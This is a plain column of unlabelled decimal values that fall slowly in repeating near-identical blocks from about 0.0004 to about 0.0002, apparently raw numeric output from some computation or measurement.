0.000399014
0.00039397
0.000394191
0.000390357
0.000390144
0.000393975
0.000394193
0.000390357
0.000398975
0.000399372
0.000402768
0.000402767
0.000402926
0.000399131
0.000399131
0.000376574
0.000376165
0.000372775
0.000372775
0.000372614
0.000376418
0.00037642
0.000363838
0.00036423
0.000367627
0.000367629
0.000367787
0.000363992
0.000363993
0.000376395
0.000376619
0.000372568
0.000372781
0.000376621
0.000376402
0.000372779
0.000381539
0.000385305
0.00038542
0.000381302
0.000381336
0.000385213
0.000381441
0.000381575
0.000381364
0.0003854
0.000385178
0.000381356
0.000385182
0.000381571
0.000376427
0.000372551
0.000376672
0.000372657
0.000376639
0.000376523
0.000372748
0.000376396
0.000376619
0.000372571
0.00037278
0.000376624
0.000376402
0.000372782
0.000381541
0.000385303
0.00038542
0.000381303
0.000385213
0.000381338
0.000381444
0.000381576
0.000381365
0.0003854
0.00038518
0.000385182
0.000381359
0.000381571
0.000376429
0.000372552
0.000376672
0.000372661
0.00037664
0.000372751
0.000376524
0.000364003
0.000367829
0.00036761
0.00036379
0.000367608
0.000363785
0.000363997
0.000358861
0.000355089
0.000359105
0.000354986
0.000358954
0.000359072
0.000355184
0.000363973
0.000367849
0.000367733
0.000363734
0.000363874
0.000367644
0.000363769
0.000358827
0.00035905
0.000355005
0.000355217
0.000359054
0.000358834
0.000355218
0.000364004
0.000367831
0.000367607
0.000363791
0.00036761
0.000363788
0.000363993
0.000358863
0.00035509
0.000359105
0.000354985
0.000359074
0.000358954
0.000355186
0.000363973
0.00036785
0.000367735
0.000363736
0.000367645
0.00036377
0.000363877
0.000358828
0.000359051
0.000355009
0.000355217
0.000359059
0.000358832
0.000355219
0.000376579
0.000376167
0.000372779
0.000372776
0.000376425
0.000376426
0.000372616
0.000363835
0.000364229
0.000367626
0.000367624
0.00036399
0.000367785
0.000363988
0.000376395
0.00037662
0.00037257
0.000372781
0.000376623
0.000376402
0.00037278
0.00038154
0.000385304
0.000385423
0.000381304
0.000381339
0.000385213
0.000381443
0.000381575
0.000381365
0.000385401
0.000385179
0.000381358
0.000385181
0.000381569
0.000376427
0.000372554
0.000376673
0.000372659
0.000376641
0.000376523
0.00037275
0.000376395
0.000376621
0.000372778
0.000372572
0.000376402
0.000376625
0.00037278
0.000381544
0.000385308
0.000385428
0.000381308
0.000385218
0.000381344
0.000381447
0.000381576
0.000381366
0.000385178
0.000385406
0.000385182
0.000381568
0.000381362
0.000376428
0.000372559
0.000376676
0.000372662
0.000376645
0.000372751
0.000376526
0.000364002
0.000367831
0.000367609
0.000363794
0.000367608
0.000363786
0.000363994
0.00035886
0.000355089
0.000359104
0.000354983
0.000358955
0.000359071
0.000355183
0.000363972
0.00036785
0.000367735
0.000363735
0.000363877
0.000367644
0.00036377
0.000358825
0.000359051
0.000355003
0.000355216
0.000359053
0.000358832
0.000355217
0.000364002
0.000367606
0.000367833
0.000363793
0.000367607
0.000363994
0.000363789
0.000358861
0.00035509
0.000359106
0.000354986
0.000359075
0.000358956
0.000355182
0.000363973
0.000367859
0.000367737
0.000363739
0.000367646
0.000363776
0.000363878
0.000358826
0.000359051
0.000355217
0.000355004
0.000358834
0.000359055
0.000355215
0.000376397
0.000376622
0.000372777
0.000372574
0.000376399
0.000376628
0.000372779
0.000381543
0.000385307
0.000385422
0.000381305
0.000381445
0.000385217
0.000381341
0.000381576
0.000381366
0.00038518
0.000385406
0.000381566
0.000385184
0.000381363
0.00037643
0.00037256
0.000376676
0.000372662
0.000376526
0.000376644
0.000372752
0.000364003
0.000367831
0.000367607
0.000363789
0.000367609
0.000363786
0.000363995
0.00035886
0.000355093
0.000359105
0.000354989
0.000355187
0.000358956
0.000359074
0.000363971
0.000367851
0.000367731
0.000363735
0.000367644
0.000363873
0.00036377
0.000358826
0.000359053
0.00035501
0.00035522
0.000355221
0.000359055
0.000358834
0.000364002
0.000367609
0.000367834
0.000363792
0.000367606
0.000363997
0.000363788
0.000358859
0.000355091
0.000359107
0.000354985
0.000359073
0.000358957
0.00035518
0.000363972
0.000367859
0.000367738
0.000363739
0.000367646
0.000363775
0.000363877
0.000358827
0.000359054
0.000355218
0.000355005
0.000358835
0.000359054
0.000355215
0.00037658
0.000376163
0.000372775
0.000372774
0.00037642
0.00037642
0.000372618
0.000363839
0.000364234
0.000367624
0.000367626
0.000363994
0.000367788
0.000363994
0.000376398
0.00037662
0.00037278
0.000372575
0.000376402
0.000376626
0.000372784
0.000381543
0.000385306
0.000385422
0.000381305
0.000381444
0.000385216
0.00038134
0.000381577
0.000381365
0.000385183
0.000385404
0.000381571
0.000385185
0.00038136
0.000376431
0.000372559
0.000376675
0.000372662
0.000376524
0.000376643
0.000372756
0.000364006
0.000367611
0.000367834
0.000363795
0.000367611
0.000363996
0.00036379
0.000358863
0.000355094
0.000359108
0.00035499
0.000355189
0.000358958
0.000359076
0.000363975
0.000367853
0.000367737
0.000363738
0.000367648
0.000363879
0.000363772
0.000358831
0.000359055
0.000355221
0.000355013
0.000355224
0.000358836
0.00035906
0.000364003
0.000367608
0.000367835
0.000363794
0.00036761
0.000363998
0.000363789
0.000358862
0.000355093
0.00035911
0.000354991
0.00035908
0.000358958
0.000355184
0.000363975
0.000367858
0.000367737
0.00036374
0.000367648
0.000363777
0.000363879
0.000358825
0.000359056
0.00035522
0.000355007
0.000358839
0.000359056
0.000355215
0.000363836
0.000364232
0.00036763
0.000367627
0.000367788
0.000363992
0.00036399
0.000341441
0.000341025
0.000337636
0.000337633
0.000337478
0.000341281
0.000341279
0.000328702
0.000329095
0.000332486
0.000332487
0.000332649
0.000328856
0.000328856
0.000341259
0.000341484
0.000337435
0.000337644
0.000341488
0.000341267
0.000337645
0.000346406
0.000350168
0.000350288
0.000346166
0.000346204
0.00035008
0.000346307
0.00034644
0.000346228
0.000350266
0.00035004
0.000346222
0.000350046
0.000346432
0.000341292
0.000337417
0.000341537
0.000337521
0.000341506
0.000341388
0.000337612
0.000341259
0.000341484
0.000337437
0.000337642
0.000341489
0.000341263
0.000337643
0.000346404
0.000350165
0.000350283
0.000346167
0.000350077
0.000346201
0.000346307
0.000346441
0.000346229
0.000350267
0.000350041
0.000350047
0.000346224
0.000346434
0.000341292
0.000337422
0.000341538
0.000337524
0.000341505
0.000337615
0.000341387
0.000328867
0.000332694
0.000332471
0.000328657
0.000332471
0.000328653
0.000328856
0.000323726
0.000319952
0.00032397
0.00031985
0.000323818
0.000323938
0.000320047
0.000328835
0.000332715
0.000332597
0.000328601
0.00032874
0.000332505
0.000328636
0.00032369
0.000323917
0.000319873
0.000320078
0.000323924
0.000323692
0.000320078
0.000328864
0.000332698
0.00033247
0.000328657
0.00033247
0.000328653
0.000328857
0.00032372
0.000319954
0.000323971
0.00031985
0.000323937
0.000323818
0.000320043
0.000328836
0.000332722
0.000332599
0.000328602
0.000332508
0.000328639
0.000328742
0.000323685
0.000323915
0.000319868
0.000320081
0.000323917
0.000323693
0.000320077
0.00034144
0.00034103
0.000337639
0.00033764
0.000341285
0.000341285
0.000337478
0.000328702
0.000329095
0.000332488
0.000332489
0.000328858
0.000332649
0.000328856
0.000341263
0.000341484
0.000337434
0.000337646
0.000341487
0.000341269
0.000337648
0.000346402
0.000350165
0.000350283
0.000346166
0.0003462
0.000350076
0.000346304
0.000346441
0.000346227
0.000350262
0.000350042
0.00034622
0.000350045
0.000346436
0.000341291
0.000337416
0.000341537
0.000337522
0.000341503
0.000341385
0.000337614
0.000341261
0.000341484
0.000337644
0.000337435
0.000341266
0.000341488
0.000337645
0.000346403
0.000350166
0.000350283
0.000346168
0.000350075
0.0003462
0.000346307
0.00034644
0.000346228
0.000350042
0.000350263
0.000350045
0.000346436
0.00034622
0.000341292
0.000337417
0.000341536
0.000337523
0.000341503
0.000337614
0.000341387
0.00032887
0.000332694
0.000332476
0.000328656
0.000332475
0.000328654
0.000328862
0.000323728
0.000319959
0.000323973
0.000319857
0.000323824
0.000323944
0.00032005
0.000328841
0.000332715
0.000332598
0.000328602
0.000328743
0.000332509
0.000328639
0.00032369
0.000323916
0.000319873
0.000320079
0.000323924
0.000323697
0.000320078
0.000328867
0.000332475
0.000332693
0.000328655
0.000332472
0.000328859
0.000328651
0.000323722
0.000319953
0.000323969
0.000319848
0.000323935
0.000323817
0.000320045
0.000328836
0.000332713
0.000332597
0.000328601
0.000332507
0.000328634
0.00032874
0.000323688
0.000323914
0.000320083
0.000319866
0.000323698
0.000323916
0.000320078
0.000341262
0.000341484
0.000337644
0.000337435
0.000341268
0.000341487
0.000337646
0.000346405
0.000350168
0.000350283
0.000346167
0.000346306
0.000350076
0.000346201
0.000346443
0.000346229
0.000350045
0.000350265
0.000346437
0.000350048
0.000346222
0.000341293
0.000337416
0.000341536
0.000337522
0.000341387
0.000341503
0.000337615
0.000328869
0.000332695
0.000332474
0.000328654
0.000332473
0.00032865
0.000328861
0.000323726
0.000319957
0.00032397
0.000319853
0.000320052
0.00032382
0.000323938
0.000328837
0.000332715
0.000332598
0.000328601
0.000332509
0.000328741
0.000328635
0.000323692
0.000323916
0.000319875
0.000320086
0.000320087
0.000323921
0.0003237
0.000328869
0.000332473
0.000332696
0.000328655
0.000332476
0.000328859
0.000328651
0.000323729
0.000319955
0.00032397
0.00031985
0.000323937
0.00032382
0.00032005
0.00032884
0.000332715
0.000332599
0.0003286
0.000332513
0.000328634
0.00032874
0.000323693
0.000323917
0.000320083
0.000319872
0.000323697
0.000323922
0.000320082
0.00034144
0.00034103
0.000337642
0.00033764
0.000341283
0.000341284
0.000337479
0.000328702
0.000329098
0.000332493
0.000332496
0.000328859
0.000332651
0.00032886
0.000341263
0.000341485
0.000337643
0.000337439
0.000341265
0.00034149
0.000337647
0.000346406
0.000350168
0.000350288
0.000346168
0.000346307
0.000350079
0.000346205
0.000346441
0.00034623
0.000350046
0.000350266
0.000346434
0.000350045
0.000346225
0.000341293
0.000337419
0.000341538
0.000337524
0.000341386
0.000341505
0.000337615
0.000328868
0.000332474
0.000332697
0.000328657
0.000332473
0.000328864
0.000328652
0.000323727
0.000319958
0.000323972
0.000319855
0.000320053
0.000323822
0.000323944
0.000328839
0.000332721
0.000332601
0.000328602
0.000332511
0.000328742
0.000328639
0.000323692
0.00032392
0.000320089
0.000319877
0.000320088
0.000323703
0.000323923
0.000328869
0.000332471
0.0003327
0.000328657
0.000332475
0.00032886
0.000328656
0.000323727
0.000319955
0.000323973
0.000319852
0.000323939
0.000323821
0.000320049
0.000328838
0.000332717
0.000332599
0.000328603
0.000332509
0.000328637
0.000328742
0.000323692
0.000323919
0.000320084
0.000319873
0.000323702
0.000323922
0.000320082
0.000328701
0.000329099
0.000332494
0.000332495
0.000332651
0.000328858
0.000328859
0.000306308
0.000305892
0.000302501
0.000302502
0.000302345
0.000306148
0.000306149
0.000293567
0.000293962
0.000297351
0.000297354
0.000297513
0.000293723
0.000293723
0.000306124
0.000306349
0.0003023
0.000302513
0.000306353
0.000306134
0.000302511
0.000311268
0.000315033
0.00031515
0.000311032
0.000311067
0.00031494
0.000311172
0.000311302
0.000311092
0.00031513
0.000314904
0.000311088
0.000314906
0.000311299
0.000306157
0.000302282
0.000306402
0.000302387
0.00030637
0.000306252
0.000302478
0.000306127
0.000306349
0.0003023
0.000302512
0.000306352
0.000306134
0.000302513
0.00031127
0.000315033
0.000315149
0.000311033
0.000314941
0.000311067
0.000311174
0.000311308
0.000311094
0.000315128
0.000314909
0.000314912
0.000311087
0.000311301
0.000306157
0.000302282
0.000306403
0.000302392
0.000306369
0.000302481
0.000306254
0.000293735
0.00029756
0.00029734
0.000293522
0.000297341
0.000293516
0.000293727
0.000288593
0.000284822
0.000288836
0.000284718
0.000288686
0.000288804
0.000284917
0.000293702
0.000297578
0.000297462
0.000293466
0.000293606
0.000297373
0.000293499
0.000288557
0.000288782
0.000284737
0.000284951
0.000288785
0.000288563
0.00028495
0.000293737
0.000297559
0.000297339
0.000293523
0.000297341
0.00029352
0.000293727
0.000288596
0.000284825
0.000288837
0.000284719
0.000288807
0.000288688
0.000284918
0.000293707
0.000297579
0.000297464
0.000293468
0.000297374
0.000293502
0.000293609
0.000288556
0.000288783
0.000284741
0.000284949
0.00028879
0.000288563
0.000284948
0.000306312
0.000305898
0.000302511
0.000302509
0.000306155
0.000306155
0.00030235
0.000293572
0.000293963
0.000297358
0.000297358
0.000293725
0.000297519
0.000293725
0.000306123
0.000306346
0.0003023
0.000302506
0.000306352
0.000306125
0.00030251
0.000311269
0.000315033
0.000315153
0.000311032
0.000311068
0.000314943
0.000311172
0.000311303
0.000311091
0.00031513
0.000314904
0.000311087
0.000314907
0.000311295
0.000306156
0.00030228
0.0003064
0.000302388
0.000306368
0.00030625
0.000302479
0.000306123
0.000306348
0.000302508
0.000302301
0.000306127
0.000306352
0.000302512
0.00031127
0.000315032
0.000315147
0.000311031
0.000314942
0.000311066
0.000311172
0.000311304
0.000311092
0.000314907
0.000315128
0.000314908
0.000311296
0.000311087
0.000306156
0.000302282
0.0003064
0.000302388
0.000306368
0.000302479
0.00030625
0.000293734
0.000297559
0.000297338
0.000293521
0.00029734
0.000293517
0.000293725
0.000288589
0.000284822
0.000288838
0.000284721
0.000288687
0.000288806
0.000284913
0.000293703
0.000297577
0.000297463
0.000293467
0.000293608
0.000297372
0.000293501
0.000288551
0.00028878
0.000284736
0.000284944
0.000288784
0.000288559
0.000284942
0.000293735
0.000297336
0.000297564
0.000293521
0.00029734
0.000293722
0.000293521
0.000288592
0.000284822
0.000288835
0.000284718
0.000288803
0.000288685
0.000284917
0.000293704
0.00029758
0.000297463
0.000293467
0.000297375
0.000293501
0.000293607
0.000288555
0.000288781
0.00028495
0.000284737
0.000288562
0.000288785
0.000284947
0.000306126
0.000306358
0.000302511
0.000302302
0.000306134
0.000306354
0.000302512
0.000311271
0.000315034
0.000315148
0.000311033
0.000311174
0.000314943
0.000311068
0.000311307
0.000311099
0.000314914
0.00031513
0.000311307
0.000314913
0.000311089
0.000306157
0.000302284
0.000306404
0.00030239
0.000306254
0.00030637
0.000302479
0.000293736
0.000297565
0.000297338
0.00029352
0.000297343
0.000293524
0.000293725
0.000288593
0.000284828
0.000288844
0.000284726
0.00028492
0.000288691
0.000288813
0.000293706
0.000297588
0.000297469
0.000293474
0.000297377
0.000293612
0.00029351
0.000288554
0.000288785
0.000284743
0.000284953
0.000284951
0.000288792
0.000288563
0.000293737
0.000297341
0.000297562
0.000293521
0.000297342
0.000293729
0.00029352
0.000288596
0.000284826
0.00028884
0.000284722
0.000288808
0.00028869
0.00028492
0.000293707
0.000297582
0.000297465
0.00029347
0.000297377
0.000293504
0.000293608
0.000288559
0.000288784
0.00028495
0.000284741
0.000288566
0.000288789
0.000284949
0.000306304
0.000305895
0.000302503
0.000302504
0.000306148
0.000306146
0.000302344
0.000293569
0.000293963
0.000297354
0.000297357
0.000293723
0.000297515
0.000293723
0.000306127
0.000306349
0.000302511
0.000302302
0.000306131
0.000306352
0.000302514
0.000311271
0.000315031
0.000315149
0.000311034
0.000311173
0.000314942
0.000311068
0.000311307
0.000311094
0.00031491
0.000315131
0.0003113
0.000314912
0.000311089
0.000306158
0.000302284
0.000306403
0.000302391
0.000306253
0.000306369
0.000302481
0.000293738
0.000297338
0.000297569
0.000293524
0.000297344
0.000293725
0.000293526
0.000288592
0.000284825
0.000288841
0.000284724
0.000284919
0.000288686
0.000288807
0.000293707
0.000297586
0.000297467
0.00029347
0.000297379
0.00029361
0.000293506
0.000288558
0.000288787
0.000284951
0.000284747
0.000284952
0.000288565
0.000288795
0.000293738
0.000297341
0.000297563
0.000293527
0.000297341
0.000293729
0.000293523
0.000288596
0.000284828
0.00028884
0.000284725
0.000288808
0.000288689
0.000284919
0.000293707
0.000297582
0.000297465
0.00029347
0.000297376
0.000293506
0.00029361
0.000288562
0.000288788
0.000284948
0.000284746
0.000288565
0.000288795
0.00028495
0.000293569
0.000293965
0.000297357
0.000297359
0.000297516
0.000293724
0.000293724
0.000271176
0.000270765
0.000267374
0.000267374
0.000267215
0.000271018
0.000271019
0.000258444
0.000258837
0.000262223
0.000262225
0.000262385
0.000258598
0.000258598
0.000270994
0.000271221
0.000267179
0.00026738
0.000271226
0.000270998
0.000267387
0.000276139
0.0002799
0.000280017
0.000275902
0.000275939
0.000279811
0.000276041
0.000276175
0.000275965
0.000279996
0.000279777
0.000275957
0.00027978
0.000276169
0.000271026
0.000267158
0.000271274
0.00026726
0.000271244
0.000271122
0.000267351
0.000270994
0.000271219
0.000267175
0.000267379
0.000271224
0.000270997
0.000267383
0.000276142
0.000279902
0.000280016
0.000275903
0.000279811
0.000275937
0.000276044
0.000276179
0.000275964
0.000279999
0.000279778
0.000279783
0.000275959
0.00027617
0.000271027
0.000267157
0.000271274
0.000267261
0.00027124
0.000267353
0.000271122
0.000258613
0.000262442
0.000262212
0.000258401
0.000262217
0.000258403
0.000258599
0.000253467
0.000249701
0.000253715
0.000249601
0.000253563
0.000253683
0.000249792
0.000258581
0.000262456
0.000262338
0.000258344
0.000258483
0.000262249
0.00025838
0.000253429
0.00025366
0.000249619
0.000249823
0.000253668
0.000253432
0.000249822
0.000258611
0.000262434
0.000262212
0.0002584
0.000262213
0.000258395
0.000258602
0.000253467
0.000249701
0.000253714
0.0002496
0.000253682
0.000253561
0.000249796
0.00025858
0.000262454
0.000262335
0.000258344
0.000262249
0.000258379
0.000258483
0.000253431
0.000253661
0.000249622
0.000249828
0.000253663
0.000253436
0.000249828
0.000271178
0.000270765
0.000267375
0.000267377
0.000271021
0.000271018
0.000267218
0.000258444
0.000258836
0.000262223
0.000262227
0.000258597
0.000262387
0.000258598
0.000270993
0.00027122
0.000267172
0.000267381
0.000271222
0.000271
0.000267381
0.000276139
0.000279898
0.000280019
0.000275902
0.000275939
0.000279807
0.000276043
0.000276176
0.000275964
0.000279995
0.000279776
0.000275956
0.000279777
0.000276172
0.000271027
0.000267155
0.000271272
0.00026726
0.000271242
0.000271123
0.000267351
0.000270993
0.000271219
0.000267378
0.00026717
0.000270998
0.000271223
0.000267381
0.000276139
0.000279898
0.000280015
0.000275901
0.000279808
0.000275937
0.000276042
0.000276176
0.000275964
0.000279778
0.000279997
0.000279778
0.00027617
0.000275958
0.000271028
0.000267155
0.00027127
0.00026726
0.000271242
0.00026735
0.000271122
0.000258608
0.000262431
0.000262211
0.000258395
0.00026221
0.000258391
0.000258599
0.000253464
0.000249696
0.000253709
0.000249592
0.000253559
0.000253677
0.000249791
0.000258576
0.000262451
0.000262335
0.00025834
0.000258481
0.000262244
0.000258374
0.000253427
0.000253654
0.000249615
0.000249821
0.000253661
0.000253434
0.000249822
0.000258608
0.000262209
0.000262431
0.000258393
0.000262211
0.000258598
0.000258389
0.000253462
0.000249696
0.000253706
0.000249592
0.000253675
0.000253556
0.000249789
0.000258575
0.000262449
0.000262333
0.000258338
0.000262243
0.000258372
0.000258479
0.000253426
0.000253653
0.000249822
0.000249612
0.000253432
0.000253655
0.000249821
0.000270992
0.000271217
0.000267378
0.000267173
0.000270992
0.000271224
0.000267382
0.00027614
0.000279903
0.00028002
0.000275903
0.000276043
0.000279814
0.000275939
0.000276174
0.000275962
0.000279777
0.00028
0.000276164
0.000279781
0.000275958
0.000271027
0.000267154
0.000271273
0.000267259
0.000271122
0.00027124
0.000267351
0.00025861
0.000262434
0.000262213
0.000258395
0.000262216
0.000258392
0.000258601
0.000253467
0.000249702
0.000253712
0.000249599
0.000249797
0.000253562
0.000253681
0.000258581
0.000262455
0.000262339
0.000258343
0.000262249
0.000258484
0.000258379
0.000253429
0.000253658
0.000249622
0.000249828
0.000249829
0.000253662
0.000253436
0.000258612
0.000262212
0.000262434
0.000258396
0.000262215
0.000258602
0.000258395
0.000253467
0.0002497
0.000253712
0.000249596
0.000253679
0.000253563
0.000249793
0.000258581
0.000262452
0.000262336
0.000258341
0.000262248
0.000258377
0.000258482
0.000253432
0.000253658
0.000249827
0.000249617
0.00025344
0.00025366
0.000249827
0.000271174
0.000270765
0.000267374
0.000267371
0.000271017
0.00027102
0.000267212
0.000258438
0.000258835
0.000262222
0.000262224
0.000258595
0.000262382
0.000258595
0.000270991
0.000271219
0.000267382
0.000267173
0.000270997
0.000271225
0.000267381
0.000276142
0.000279907
0.000280025
0.000275909
0.000276049
0.000279813
0.000275947
0.000276175
0.000275964
0.000279776
0.000280004
0.000276166
0.00027978
0.000275962
0.000271027
0.00026716
0.000271278
0.000267262
0.000271126
0.000271248
0.000267352
0.000258608
0.000262214
0.00026243
0.000258396
0.000262212
0.000258598
0.000258391
0.000253465
0.000249698
0.000253708
0.000249593
0.000249792
0.00025356
0.000253678
0.000258576
0.000262452
0.000262333
0.000258338
0.000262244
0.00025848
0.000258374
0.000253427
0.000253658
0.000249825
0.000249616
0.000249827
0.000253432
0.000253662
0.000258608
0.000262215
0.000262433
0.000258397
0.000262213
0.000258601
0.000258392
0.000253463
0.000249697
0.00025371
0.000249592
0.000253677
0.000253559
0.00024979
0.000258577
0.000262454
0.000262336
0.000258341
0.000262247
0.000258376
0.000258482
0.000253429
0.000253656
0.000249822
0.000249612
0.000253434
0.000253658
0.000249823
0.000258441
0.000258837
0.000262227
0.000262228
0.000262387
0.000258597
0.000258598
0.000236052
0.000235643
0.000232253
0.000232253
0.000232091
0.000235898
0.000235898
0.000223319
0.000223712
0.000227101
0.0002271
0.00022726
0.000223474
0.000223472
0.000235866
0.000236097
0.000232051
0.00023226
0.000236099
0.000235875
0.000232259
0.000241019
0.00024478
0.000244901
0.000240781
0.000240821
0.000244689
0.000240922
0.000241053
0.000240843
0.000244877
0.000244656
0.000240837
0.000244656
0.000241051
0.000235902
0.000232036
0.00023615
0.000232137
0.000236121
0.000235999
0.000232228
0.000235868
0.000236097
0.000232054
0.000232259
0.000236105
0.000235873
0.00023226
0.000241021
0.000244777
0.000244896
0.000240783
0.00024469
0.00024082
0.000240924
0.000241057
0.000240844
0.000244881
0.00024466
0.000244661
0.000240841
0.000241049
0.000235905
0.000232037
0.000236153
0.000232141
0.000236124
0.000232231
0.000236002
0.000223483
0.00022731
0.000227092
0.000223272
0.00022709
0.000223269
0.000223477
0.000218336
0.000214573
0.000218587
0.000214471
0.000218435
0.000218555
0.000214664
0.000223454
0.000227329
0.000227213
0.000223219
0.000223359
0.000227123
0.000223254
0.000218294
0.000218529
0.000214487
0.000214698
0.000218529
0.000218305
0.000214695
0.000223486
0.000227308
0.00022709
0.000223272
0.00022709
0.00022327
0.000223476
0.00021834
0.000214574
0.000218588
0.000214472
0.000218557
0.000218436
0.000214667
0.000223456
0.000227329
0.000227212
0.00022322
0.000227122
0.000223255
0.000223361
0.000218298
0.00021853
0.000214491
0.000214698
0.000218537
0.000218303
0.000214697
0.000236061
0.000235642
0.000232257
0.000232254
0.000235902
0.000235903
0.000232098
0.000223322
0.000223712
0.0002271
0.000227099
0.000223475
0.000227262
0.000223475
0.000235866
0.000236093
0.000232047
0.000232254
0.000236097
0.00023587
0.000232256
0.000241014
0.000244772
0.000244887
0.000240776
0.00024081
0.000244683
0.000240916
0.000241052
0.000240837
0.000244871
0.000244651
0.000240833
0.000244655
0.000241044
0.000235899
0.000232027
0.000236145
0.000232135
0.000236112
0.000235994
0.000232225
0.000235863
0.000236093
0.000232255
0.000232053
0.000235868
0.000236101
0.000232257
0.000241016
0.000244774
0.000244891
0.000240778
0.000244684
0.000240818
0.000240919
0.00024105
0.000240838
0.000244652
0.000244871
0.000244653
0.000241043
0.000240835
0.000235901
0.000232035
0.000236147
0.000232135
0.000236121
0.000232228
0.000235995
0.000223486
0.000227306
0.000227087
0.000223272
0.000227087
0.000223267
0.000223475
0.000218336
0.000214572
0.000218584
0.000214467
0.000218433
0.00021855
0.000214665
0.000223452
0.000227323
0.000227209
0.000223216
0.000223358
0.000227119
0.000223249
0.000218299
0.000218532
0.00021449
0.000214698
0.000218533
0.000218304
0.000214699
0.000223488
0.000227089
0.00022731
0.000223276
0.000227088
0.00022348
0.000223275
0.000218336
0.000214569
0.000218583
0.000214467
0.000218551
0.00021843
0.000214662
0.000223454
0.000227327
0.000227209
0.000223216
0.000227121
0.000223252
0.000223358
0.0002183
0.000218537
0.000214697
0.000214491
0.000218306
0.000218539
0.000214696
0.000235867
0.000236096
0.000232255
0.000232058
0.000235871
0.000236106
0.000232256
0.000241022
0.000244778
0.000244895
0.00024078
0.00024092
0.00024469
0.000240819
0.000241055
0.000240842
0.000244656
0.00024488
0.000241048
0.00024466
0.000240841
0.000235905
0.000232038
0.00023615
0.000232137
0.000235997
0.000236123
0.00023223
0.000223487
0.000227312
0.000227091
0.000223272
0.000227093
0.000223271
0.000223478
0.000218341
0.000214576
0.000218584
0.000214473
0.000214672
0.000218436
0.000218553
0.000223456
0.000227327
0.000227211
0.000223217
0.000227124
0.000223359
0.000223253
0.0002183
0.000218533
0.000214493
0.000214704
0.000214704
0.000218537
0.000218307
0.000223482
0.000227087
0.000227312
0.000223272
0.000227086
0.000223474
0.000223269
0.000218336
0.000214573
0.000218587
0.000214473
0.000218554
0.000218432
0.000214666
0.000223451
0.000227331
0.000227213
0.000223218
0.00022712
0.000223254
0.000223357
0.000218298
0.000218531
0.000214701
0.00021449
0.000218306
0.000218535
0.000214696
0.000236048
0.000235639
0.000232247
0.000232247
0.000235893
0.00023589
0.000232087
0.000223317
0.000223708
0.000227097
0.000227097
0.000223471
0.000227255
0.000223471
0.000235865
0.000236091
0.000232258
0.000232046
0.00023587
0.000236093
0.000232258
0.000241012
0.000244773
0.000244888
0.000240776
0.000240917
0.000244683
0.00024081
0.000241051
0.000240836
0.000244653
0.00024487
0.000241043
0.000244656
0.00024083
0.000235898
0.000232029
0.000236144
0.000232135
0.000235994
0.000236111
0.000232227
0.000223481
0.00022709
0.000227302
0.000223266
0.000227089
0.000223471
0.000223264
0.000218334
0.000214573
0.000218583
0.000214472
0.000214668
0.000218431
0.000218551
0.00022345
0.00022732
0.000227206
0.000223213
0.000227118
0.000223355
0.000223248
0.000218293
0.000218528
0.000214696
0.000214493
0.000214697
0.000218298
0.000218534
0.000223483
0.000227092
0.000227305
0.000223272
0.000227089
0.000223475
0.00022327
0.000218338
0.000214571
0.000218585
0.000214471
0.000218557
0.000218433
0.000214664
0.000223454
0.000227324
0.000227209
0.000223216
0.00022712
0.000223253
0.000223358
0.000218293
0.000218529
0.000214693
0.000214492
0.000218298
0.000218538
0.000214692
0.000223315
0.000223712
0.000227098
0.000227097
0.000227255
0.00022347
0.00022347
0.000200923
0.000200515
0.000197122
0.000197118
0.000196958
0.000200769
0.000200766
0.000188187
0.000188581
0.000191963
0.000191961
0.000192121
0.000188344
0.000188342
0.00020073
0.000200964
0.000196924
0.000197129
0.000200969
0.000200734
0.00019713
0.000205888
0.000209646
0.000209764
0.000205651
0.000205687
0.000209557
0.000205791
0.000205925
0.000205712
0.000209743
0.000209529
0.000205707
0.00020953
0.000205918
0.000200768
0.000196901
0.000201017
0.000197006
0.000200985
0.000200865
0.000197098
0.00020073
0.000200964
0.000196923
0.000197129
0.000200966
0.000200736
0.00019713
0.000205889
0.000209647
0.000209764
0.000205655
0.000209559
0.000205688
0.000205794
0.000205925
0.000205712
0.000209746
0.00020953
0.000209531
0.000205707
0.000205919
0.000200769
0.000196912
0.000201021
0.000197014
0.000200988
0.000197104
0.000200868
0.000188357
0.000192178
0.000191962
0.000188141
0.000191964
0.000188138
0.000188345
0.000183201
0.000179436
0.000183447
0.000179334
0.000183296
0.000183415
0.000179531
0.000188323
0.000192191
0.000192077
0.000188084
0.000188227
0.00019199
0.000188119
0.000183158
0.000183394
0.000179357
0.000179563
0.000183396
0.000183163
0.000179564
0.00018836
0.00019218
0.000191963
0.000188143
0.000191963
0.000188142
0.000188348
0.000183201
0.000179442
0.000183452
0.00017934
0.00018342
0.0001833
0.000179535
0.000188326
0.000192203
0.000192084
0.00018809
0.000191994
0.000188127
0.000188233
0.00018316
0.000183396
0.000179363
0.000179564
0.000183399
0.000183165
0.000179566
0.000200929
0.000200515
0.000197127
0.000197125
0.000200771
0.000200771
0.000196965
0.000188192
0.000188584
0.000191968
0.000191968
0.000188348
0.000192127
0.000188347
0.000200727
0.000200963
0.000196923
0.000197126
0.000200967
0.000200735
0.000197126
0.000205889
0.000209646
0.000209761
0.000205652
0.000205688
0.000209556
0.000205791
0.000205923
0.000205711
0.000209745
0.000209528
0.000205708
0.00020953
0.000205917
0.000200768
0.000196909
0.000201019
0.000197008
0.000200988
0.000200864
0.000197099
0.000200729
0.000200962
0.000197126
0.000196918
0.000200733
0.000200963
0.000197128
0.000205886
0.000209642
0.000209759
0.000205648
0.000209555
0.000205683
0.000205788
0.000205923
0.000205709
0.000209525
0.000209744
0.000209528
0.000205913
0.000205705
0.000200765
0.000196899
0.000201013
0.000197005
0.00020098
0.000197095
0.000200861
0.000188357
0.000192181
0.00019196
0.000188141
0.000191959
0.000188141
0.000188345
0.000183198
0.000179435
0.000183448
0.000179334
0.000183296
0.000183418
0.000179528
0.000188326
0.000192202
0.000192079
0.000188086
0.000188229
0.000191992
0.000188126
0.000183153
0.000183393
0.000179354
0.000179562
0.000183398
0.000183162
0.000179558
0.000188355
0.000191961
0.000192172
0.000188139
0.000191959
0.000188346
0.000188136
0.0001832
0.000179436
0.000183449
0.000179336
0.00018342
0.000183297
0.000179528
0.000188323
0.000192189
0.000192076
0.000188085
0.000191987
0.000188121
0.000188228
0.000183154
0.000183391
0.000179558
0.000179356
0.000183159
0.000183398
0.000179559
0.000200731
0.000200966
0.000197127
0.000196925
0.000200734
0.000200972
0.000197131
0.00020589
0.000209649
0.000209766
0.000205655
0.000205795
0.00020956
0.000205693
0.000205926
0.000205714
0.000209533
0.000209746
0.000205919
0.000209531
0.00020571
0.000200769
0.000196906
0.000201021
0.000197008
0.000200869
0.000200993
0.000197098
